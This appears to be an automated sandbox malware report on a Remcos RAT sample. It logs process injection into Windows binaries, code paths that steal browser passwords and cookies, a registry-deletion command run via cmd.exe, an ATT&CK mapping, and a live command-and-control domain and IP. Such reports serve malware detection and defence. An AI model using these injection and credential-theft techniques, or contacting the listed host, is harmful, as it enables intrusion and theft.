              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E30000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 670000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 700000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 710000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 720000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 730000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 680000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 690000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6A0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6B0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6C0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 6D0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: DF0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2EC0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2ED0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E00000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E10000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E20000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: E30000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000
              Injects a PE file into a foreign process
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\mobsync.exe base: 10590000 value starts with: 4D5A
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A
              Contains functionality to inject code into remote processes
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0041412B CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,14_2_0041412B
              Creates a thread in another existing process (thread injection)
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: BE0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2EC0000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: E30000
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E70000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 670000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 730000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6B0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: 6D0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: DF0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2ED0000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: E30000
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E70000
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 14_2_0040FAC7
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 28_2_0074FAC7
              Source: C:\Users\user\Desktop\ZfigYV6HXd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
              Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00754F84 StrToIntA,mouse_event,28_2_00754F84
              Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
              Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp Binary or memory string: Progman
              Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
              Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
              Source: logagent.exe, 0000000E.00000000.303926845.0000000003820000.00000002.00020000.sdmp, mobsync.exe, 0000001C.00000000.414528465.00000000031F0000.00000002.00020000.sdmp, logagent.exe, 00000020.00000000.422263438.0000000003A30000.00000002.00020000.sdmp Binary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\logagent.exe Code function: EnumSystemLocalesW, 14_2_0044A1D0
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoA, 14_2_0040D1E5
              Source: C:\Windows\SysWOW64\logagent.exe Code function: EnumSystemLocalesW, 14_2_0044A21B
              Source: C:\Windows\SysWOW64\logagent.exe Code function: EnumSystemLocalesW, 14_2_0044A2B6
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_0044A343
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoW, 14_2_004423BA
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoW, 14_2_0044A593
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_0044A6BC
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetLocaleInfoW, 14_2_0044A7C3
              Source: C:\Windows\SysWOW64\logagent.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_0044A890
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoA, 28_2_0074D1E5
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: EnumSystemLocalesW, 28_2_0078A1D0
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: EnumSystemLocalesW, 28_2_0078A21B
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: EnumSystemLocalesW, 28_2_0078A2B6
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 28_2_0078A343
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoW, 28_2_007823BA
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoW, 28_2_0078A593
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 28_2_0078A6BC
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetLocaleInfoW, 28_2_0078A7C3
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_0078A890
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: EnumSystemLocalesW, 28_2_00781ED1
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 28_2_00789F58
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0042F9B4 cpuid 14_2_0042F9B4
              Source: C:\Windows\SysWOW64\logagent.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_0041D0EF timeGetSystemTime,14_2_0041D0EF
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: 28_2_00782C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_00782C8E
              Source: C:\Windows\SysWOW64\logagent.exe Code function: 14_2_00416D9E GetComputerNameExW,GetUserNameW,14_2_00416D9E

              Stealing of Sensitive Information:

              Yara detected Remcos RAT
              Source: Yara match File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara match File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara match File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara match File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\logagent.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 14_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exe Code function: \key3.db 14_2_0040A012
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 28_2_0074A012
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: \key3.db 28_2_0074A012
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 28_2_00749EF4

              Remote Access Functionality:

              Detected Remcos RAT
              Source: logagent.exe String found in binary or memory: Remcos_Mutex_Inj
              Source: logagent.exe, 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: mobsync.exe String found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: logagent.exe, 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
              Source: logagent.exe, 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: C:\Windows\SysWOW64\logagent.exe Code function: cmd.exe 14_2_004055EA
              Source: C:\Windows\SysWOW64\mobsync.exe Code function: cmd.exe 28_2_007455EA

Mitre Att&ck Matrix

The matrix is listed here by tactic. Digits after a technique are the report's signature counters, shown as they were rendered; a technique with no digits had no matching signature for this sample.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scripting (1); Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Application Shimming (1); Windows Service (1); Registry Run Keys / Startup Folder (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Application Shimming (1); Access Token Manipulation (1); Windows Service (1); Process Injection (422); Registry Run Keys / Startup Folder (1); Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (2); Software Packing (1); Masquerading (1); Modify Registry (1); Access Token Manipulation (1); Process Injection (422); Masquerading
Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (2); System Information Discovery (33); Security Software Discovery (12); Process Discovery (2); System Owner/User Discovery (1); Remote System Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Input Capture (11); Clipboard Data (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (11); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Defacement (1); Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Behavior Graph ID: 488388 | Sample: ZfigYV6HXd | Start date: 22/09/2021 | Architecture: WINDOWS | Score: 100

Signatures attached to the start node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
DNS/IP attached to the start node: trapboijiggy.dvrlists.com

Process tree recovered from the graph. Indentation is parent to child; the numbers in parentheses are the graph's created-registry-value / created-file counters as rendered; DNS/IP contacts, dropped files and signatures are listed under the process that produced them.

ZfigYV6HXd.exe (1, 23)
    DNS/IP: sn-files.fe.1drv.com; onedrive.live.com; l5d8cg.sn.files.1drv.com
    Dropped: C:\Users\Public\Libraries\...\Kkjczlm.exe (PE32)
    Signatures: Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
    logagent.exe (2)
        DNS/IP: trapboijiggy.dvrlists.com 31.3.152.100, ports 49745, 49746, 49747, ALTUSNL, Sweden; 192.168.2.1 (unknown)
        Signatures: Contains functionality to inject code into remote processes; Delayed program exit found
    cmd.exe (1)
        reg.exe (1)
            conhost.exe
        conhost.exe
    cmd.exe (1)
        cmd.exe (1)
            conhost.exe
        conhost.exe
Kkjczlm.exe (14)
    DNS/IP: sn-files.fe.1drv.com; 2 other IPs or domains
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions
    mobsync.exe
        Signatures: Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; Contains functionality to steal Firefox passwords or cookies
Kkjczlm.exe (17)
    DNS/IP: sn-files.fe.1drv.com; 2 other IPs or domains
    logagent.exe


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
ZfigYV6HXd.exe | 31% | Virustotal | -
ZfigYV6HXd.exe | 27% | ReversingLabs | Win32.Trojan.Generic
ZfigYV6HXd.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | 100% | Joe Sandbox ML | -
C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | 27% | ReversingLabs | Win32.Backdoor.Androm

Unpacked PE Files

Source | Detection | Scanner | Label
32.2.logagent.exe.10590000.2.unpack | 100% | Avira | TR/Dropper.Gen
14.0.logagent.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
32.2.logagent.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
28.0.mobsync.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
28.0.mobsync.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
28.0.mobsync.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
32.0.logagent.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
28.0.mobsync.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.0.logagent.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.0.logagent.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
32.0.logagent.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
28.2.mobsync.exe.740000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
28.2.mobsync.exe.10590000.2.unpack | 100% | Avira | TR/Dropper.Gen
32.0.logagent.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.2.logagent.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
32.0.logagent.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.0.logagent.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.2.logagent.exe.10590000.1.unpack | 100% | Avira | TR/Dropper.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
trapboijiggy.dvrlists.com | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
trapboijiggy.dvrlists.com | 31.3.152.100 | true | false | - | high
onedrive.live.com | unknown | unknown | false | - | high
l5d8cg.sn.files.1drv.com | unknown | unknown | false | - | high

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
trapboijiggy.dvrlists.com | true | Avira URL Cloud: safe | unknown

The reputation verdicts above should not be read as clearance. Avira URL Cloud rates trapboijiggy.dvrlists.com safe and the Contacted Domains table marks it not malicious, yet it is the only non-Microsoft host the sample reaches, it is contacted three times by logagent.exe (the process whose memory carries the Remcos_Mutex_Inj string), and the sandbox itself lists the URL as malicious. Dynamic-DNS names like this one are typically too young to have a reputation; block on the behavior, not on the reputation score.

                    Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
31.3.152.100 | trapboijiggy.dvrlists.com | Sweden | 51430 | ALTUSNL | false

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:488388
                    Start date:22.09.2021
                    Start time:22:01:08
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 13m 21s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:ZfigYV6HXd (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:36
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.evad.winEXE@23/10@42/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 41.7% (good quality ratio 39.7%)
                    • Quality average: 83.1%
                    • Quality standard deviation: 26.6%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 30
                    • Number of non-executed functions: 293
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56, 13.107.42.13, 13.107.42.12, 20.82.209.183, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.50.102.62
                    • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
